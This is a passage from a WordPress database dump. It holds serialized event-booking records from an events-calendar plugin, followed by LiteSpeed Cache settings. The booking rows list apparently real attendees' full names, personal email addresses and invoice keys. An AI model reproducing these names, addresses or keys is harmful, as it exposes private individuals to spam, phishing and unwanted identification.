Milelli\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6277053,'GHO72540','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266779;s:11:\"invoice_key\";s:32:\"d135f954d79bf2e8e615b94e3d1ab636\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279442,'MSZ77243','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266780;s:11:\"invoice_key\";s:32:\"22aea00750c1f16a2dd2125f92a379ff\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279498,'ZGJ87490','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266781;s:11:\"invoice_key\";s:32:\"36b9df3b4f0de8828afacb47e663c262\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279546,'QNL40447','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"elizabethstar1@yahoo.com\";s:4:\"name\";s:9:\"Elizabeth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266782;s:11:\"invoice_key\";s:32:\"ec72794301289d8281d6eff511206be5\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"elizabethstar1@yahoo.com\";s:4:\"name\";s:9:\"Elizabeth\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279583,'JLU20674','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"uchenwamoh@yahoo.com\";s:4:\"name\";s:4:\"Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266783;s:11:\"invoice_key\";s:32:\"a72c8b15b6f34b64bac926cda945cd56\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"uchenwamoh@yahoo.com\";s:4:\"name\";s:4:\"Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279627,'LXD72914','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266784;s:11:\"invoice_key\";s:32:\"0fb7d36fe0e9cd5b8a0450ac52fb19e2\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279812,'PHX31955','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:4:\"kery\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266785;s:11:\"invoice_key\";s:32:\"5840bbb0e16d0c7675278600e808916d\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:4:\"kery\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279841,'POU61640','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"bellasimons1@gmail.com\";s:4:\"name\";s:12:\"Bella Simons\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266786;s:11:\"invoice_key\";s:32:\"a6ae57b0d9d1ece034a972412ec25493\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"bellasimons1@gmail.com\";s:4:\"name\";s:12:\"Bella Simons\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279870,'AKM39050','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266787;s:11:\"invoice_key\";s:32:\"8d9f9ed083f5d55128bcaea0d2be16f8\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"tomw2891@gmail.com\";s:4:\"name\";s:10:\"Tom Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279892,'SRW45694','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"woodjohn185@gmail.com\";s:4:\"name\";s:9:\"John Wood\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266788;s:11:\"invoice_key\";s:32:\"5f07e891aebe7a65fcc420b1064a8366\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"woodjohn185@gmail.com\";s:4:\"name\";s:9:\"John Wood\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279916,'LPQ47947','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266789;s:11:\"invoice_key\";s:32:\"e4f19b98a211578a3e97494fb3345e9a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6279995,'DAO21292','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"edwardsgenesis21@gmail.com\";s:4:\"name\";s:14:\"Genesis Brown \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266790;s:11:\"invoice_key\";s:32:\"3bde135ac73c6f1d01f6ee7adb561e1a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"edwardsgenesis21@gmail.com\";s:4:\"name\";s:14:\"Genesis Brown \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6280138,'MWP96909','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266791;s:11:\"invoice_key\";s:32:\"84a8a6b439a5c518c4d453e6aacb6c53\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6280162,'CVJ29975','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266792;s:11:\"invoice_key\";s:32:\"52f7f8c9893c7649c72588e4edbc8533\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6280668,'litespeed.conf.__activation','-1','yes'),(6280669,'litespeed.purge.queue','-1','yes'),(6280670,'litespeed.purge.queue2','-1','yes'),(6280675,'litespeed.cloud._summary','{\"curr_request.ver\":0,\"last_request.ver\":1655063524,\"news.utime\":1655062512,\"curr_request.news\":0,\"last_request.news\":1655062512}','yes'),(6280676,'litespeed.conf._version','4.6','yes'),(6280677,'litespeed.conf.hash','LAvRrm5lx5DBsuF9N9tr29uzPvtUPry3','yes'),(6280678,'litespeed.conf.auto_upgrade','','yes'),(6280679,'litespeed.conf.api_key','','yes'),(6280680,'litespeed.conf.server_ip','','yes'),(6280681,'litespeed.conf.guest','','yes'),(6280682,'litespeed.conf.guest_optm','','yes'),(6280683,'litespeed.conf.news','1','yes'),(6280684,'litespeed.conf.guest_uas','[\"Lighthouse\",\"GTmetrix\",\"Google\",\"Pingdom\",\"bot\",\"PTST\",\"HeadlessChrome\"]','yes'),(6280685,'litespeed.conf.guest_ips','[\"208.70.247.157\",\"172.255.48.130\",\"172.255.48.131\",\"172.255.48.132\",\"172.255.48.133\",\"172.255.48.134\",\"172.255.48.135\",\"172.255.48.136\",\"172.255.48.137\",\"172.255.48.138\",\"172.255.48.139\",\"172.255.48.140\",\"172.255.48.141\",\"172.255.48.142\",\"172.255.48.143\",\"172.255.48.144\",\"172.255.48.145\",\"172.255.48.146\",\"172.255.48.147\",\"52.229.122.240\",\"104.214.72.101\",\"13.66.7.11\",\"13.85.24.83\",\"13.85.24.90\",\"13.85.82.26\",\"40.74.242.253\",\"40.74.243.13\",\"40.74.243.176\",\"104.214.48.247\",\"157.55.189.189\",\"104.214.110.135\",\"70.37.83.240\",\"65.52.36.250\",\"13.78.216.56\",\"52.162.212.163\",\"23.96.34.105\",\"65.52.113.236\",\"172.255.61.34\",\"172.255.61.35\",\"172.255.61.36\",\"172.255.61.37\",\"172.255.61.38\",\"172.255.61.39\",\"172.255.61.40\",\"104.41.2.19\",\"191.235.98.164\",\"191.235.99.221\",\"191.232.194.51\",\"52.237.235.185\",\"52.237.250.73\",\"52.237.236.145\",\"104.211.143.8\",\"104.211.165.53\",\"52.172.14.87\",\"40.83.89.214\",\"52.175.57.81\",\"20.188.63.151\",\"20.52.36.49\",\"52.246.165.153\",\"51.144.102.233\",\"13.76.97.224\",\"102.133.169.66\",\"52.231.199.170\",\"13.53.162.7\",\"40.123.218.94\"]','yes'),(6280686,'litespeed.conf.cache','1','yes'),(6280687,'litespeed.conf.cache-priv','1','yes'),(6280688,'litespeed.conf.cache-commenter','1','yes'),(6280689,'litespeed.conf.cache-rest','1','yes'),(6280690,'litespeed.conf.cache-page_login','1','yes'),(6280691,'litespeed.conf.cache-favicon','1','yes'),(6280692,'litespeed.conf.cache-resources','1','yes'),(6280693,'litespeed.conf.cache-mobile','','yes'),(6280694,'litespeed.conf.cache-mobile_rules','[\"Mobile\",\"Android\",\"Silk\\/\",\"Kindle\",\"BlackBerry\",\"Opera Mini\",\"Opera Mobi\"]','yes'),(6280695,'litespeed.conf.cache-browser','','yes'),(6280696,'litespeed.conf.cache-exc_useragents','[]','yes'),(6280697,'litespeed.conf.cache-exc_cookies','[]','yes'),(6280698,'litespeed.conf.cache-exc_qs','[]','yes'),(6280699,'litespeed.conf.cache-exc_cat','[]','yes'),(6280700,'litespeed.conf.cache-exc_tag','[]','yes'),(6280701,'litespeed.conf.cache-force_uri','[]','yes'),(6280702,'litespeed.conf.cache-force_pub_uri','[]','yes'),(6280703,'litespeed.conf.cache-priv_uri','[]','yes'),(6280704,'litespeed.conf.cache-exc','[]','yes'),(6280705,'litespeed.conf.cache-exc_roles','[]','yes'),(6280706,'litespeed.conf.cache-drop_qs','[\"fbclid\",\"gclid\",\"utm*\",\"_ga\"]','yes'),(6280707,'litespeed.conf.cache-ttl_pub','604800','yes'),(6280708,'litespeed.conf.cache-ttl_priv','1800','yes'),(6280709,'litespeed.conf.cache-ttl_frontpage','604800','yes'),(6280710,'litespeed.conf.cache-ttl_feed','604800','yes'),(6280711,'litespeed.conf.cache-ttl_rest','604800','yes'),(6280712,'litespeed.conf.cache-ttl_browser','31557600','yes'),(6280713,'litespeed.conf.cache-ttl_status','[\"403 3600\",\"404 3600\",\"500 3600\"]','yes'),(6280714,'litespeed.conf.cache-login_cookie','','yes'),(6280715,'litespeed.conf.cache-vary_group','[]','yes'),(6280716,'litespeed.conf.purge-upgrade','1','yes'),(6280717,'litespeed.conf.purge-stale','','yes'),(6280718,'litespeed.conf.purge-post_all','','yes'),(6280719,'litespeed.conf.purge-post_f','1','yes'),(6280720,'litespeed.conf.purge-post_h','1','yes'),(6280721,'litespeed.conf.purge-post_p','1','yes'),(6280722,'litespeed.conf.purge-post_pwrp','1','yes'),(6280723,'litespeed.conf.purge-post_a','1','yes'),(6280724,'litespeed.conf.purge-post_y','','yes'),(6280725,'litespeed.conf.purge-post_m','1','yes'),(6280726,'litespeed.conf.purge-post_d','','yes'),(6280727,'litespeed.conf.purge-post_t','1','yes'),(6280728,'litespeed.conf.purge-post_pt','1','yes'),(6280729,'litespeed.conf.purge-timed_urls','[]','yes'),(6280730,'litespeed.conf.purge-timed_urls_time','','yes'),(6280731,'litespeed.conf.purge-hook_all','[\"switch_theme\",\"wp_create_nav_menu\",\"wp_update_nav_menu\",\"wp_delete_nav_menu\",\"create_term\",\"edit_terms\",\"delete_term\",\"add_link\",\"edit_link\",\"delete_link\"]','yes'),(6280732,'litespeed.conf.esi','','yes'),(6280733,'litespeed.conf.esi-cache_admbar','1','yes'),(6280734,'litespeed.conf.esi-cache_commform','1','yes'),(6280735,'litespeed.conf.esi-nonce','[\"stats_nonce\",\"subscribe_nonce\"]','yes'),(6280736,'litespeed.conf.util-instant_click','','yes'),(6280737,'litespeed.conf.util-no_https_vary','','yes'),(6280738,'litespeed.conf.debug-disable_all','','yes'),(6280739,'litespeed.conf.debug','','yes'),(6280740,'litespeed.conf.debug-ips','[\"127.0.0.1\"]','yes'),(6280741,'litespeed.conf.debug-level','','yes'),(6280742,'litespeed.conf.debug-filesize','3','yes'),(6280743,'litespeed.conf.debug-cookie','','yes'),(6280744,'litespeed.conf.debug-collaps_qs','','yes'),(6280745,'litespeed.conf.debug-inc','[]','yes'),(6280746,'litespeed.conf.debug-exc','[]','yes'),(6280747,'litespeed.conf.db_optm-revisions_max','0','yes'),(6280748,'litespeed.conf.db_optm-revisions_age','0','yes'),(6280749,'litespeed.conf.optm-css_min','1','yes'),(6280750,'litespeed.conf.optm-css_comb','1','yes'),(6280751,'litespeed.conf.optm-css_comb_ext_inl','1','yes'),(6280752,'litespeed.conf.optm-ucss','','yes'),(6280753,'litespeed.conf.optm-ucss_inline','','yes'),(6280754,'litespeed.conf.optm-ucss_whitelist','[]','yes'),(6280755,'litespeed.conf.optm-ucss_exc','[]','yes'),(6280756,'litespeed.conf.optm-css_exc','[]','yes'),(6280757,'litespeed.conf.optm-js_min','1','yes'),(6280758,'litespeed.conf.optm-js_comb','','yes'),(6280759,'litespeed.conf.optm-js_comb_ext_inl','1','yes'),(6280760,'litespeed.conf.optm-js_exc','[\"jquery.js\",\"jquery.min.js\"]','yes'),(6280761,'litespeed.conf.optm-html_min','1','yes'),(6280762,'litespeed.conf.optm-html_lazy','[]','yes'),(6280763,'litespeed.conf.optm-qs_rm','','yes'),(6280764,'litespeed.conf.optm-ggfonts_rm','','yes'),(6280765,'litespeed.conf.optm-css_async','','yes'),(6280766,'litespeed.conf.optm-ccss_per_url','','yes'),(6280767,'litespeed.conf.optm-ccss_sep_posttype','[\"page\"]','yes'),(6280768,'litespeed.conf.optm-ccss_sep_uri','[]','yes'),(6280769,'litespeed.conf.optm-css_async_inline','1','yes'),(6280770,'litespeed.conf.optm-css_font_display','','yes'),(6280771,'litespeed.conf.optm-js_defer','0','yes'),(6280772,'litespeed.conf.optm-emoji_rm','1','yes'),(6280773,'litespeed.conf.optm-noscript_rm','','yes'),(6280774,'litespeed.conf.optm-ggfonts_async','','yes'),(6280775,'litespeed.conf.optm-exc_roles','[]','yes'),(6280776,'litespeed.conf.optm-ccss_con','','yes'),(6280777,'litespeed.conf.optm-js_defer_exc','[\"jquery.js\",\"jquery.min.js\",\"gtm.js\",\"analytics.js\"]','yes'),(6280778,'litespeed.conf.optm-gm_js_exc','[]','yes'),(6280779,'litespeed.conf.optm-dns_prefetch','[]','yes'),(6280780,'litespeed.conf.optm-dns_prefetch_ctrl','1','yes'),(6280781,'litespeed.conf.optm-exc','[]','yes'),(6280782,'litespeed.conf.optm-guest_only','1','yes'),(6280783,'litespeed.conf.object','','yes'),(6280784,'litespeed.conf.object-kind','','yes'),(6280785,'litespeed.conf.object-host','localhost','yes'),(6280786,'litespeed.conf.object-port','11211','yes'),(6280787,'litespeed.conf.object-life','360','yes'),(6280788,'litespeed.conf.object-persistent','1','yes'),(6280789,'litespeed.conf.object-admin','1','yes'),(6280790,'litespeed.conf.object-transients','1','yes'),(6280791,'litespeed.conf.object-db_id','0','yes'),(6280792,'litespeed.conf.object-user','','yes'),(6280793,'litespeed.conf.object-pswd','','yes'),(6280794,'litespeed.conf.object-global_groups','[\"users\",\"userlogins\",\"useremail\",\"userslugs\",\"usermeta\",\"user_meta\",\"site-transient\",\"site-options\",\"site-lookup\",\"site-details\",\"blog-lookup\",\"blog-details\",\"blog-id-cache\",\"rss\",\"global-posts\",\"global-cache-test\"]','yes'),(6280795,'litespeed.conf.object-non_persistent_groups','[\"comment\",\"counts\",\"plugins\",\"wc_session_id\"]','yes'),(6280796,'litespeed.conf.discuss-avatar_cache','','yes'),(6280797,'litespeed.conf.discuss-avatar_cron','','yes'),(6280798,'litespeed.conf.discuss-avatar_cache_ttl','604800','yes'),(6280799,'litespeed.conf.optm-localize','','yes'),(6280800,'litespeed.conf.optm-localize_domains','[\"### Popular scripts ###\",\"https:\\/\\/platform.twitter.com\\/widgets.js\",\"https:\\/\\/connect.facebook.net\\/en_US\\/fbevents.js\"]','yes'),(6280801,'litespeed.conf.media-lazy','1','yes'),(6280802,'litespeed.conf.media-lazy_placeholder','','yes'),(6280803,'litespeed.conf.media-placeholder_resp','','yes'),(6280804,'litespeed.conf.media-placeholder_resp_color','#cfd4db','yes'),(6280805,'litespeed.conf.media-placeholder_resp_svg','<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"{width}\" height=\"{height}\" viewBox=\"0 0 {width} {height}\"><rect width=\"100%\" height=\"100%\" style=\"fill:{color};fill-opacity: 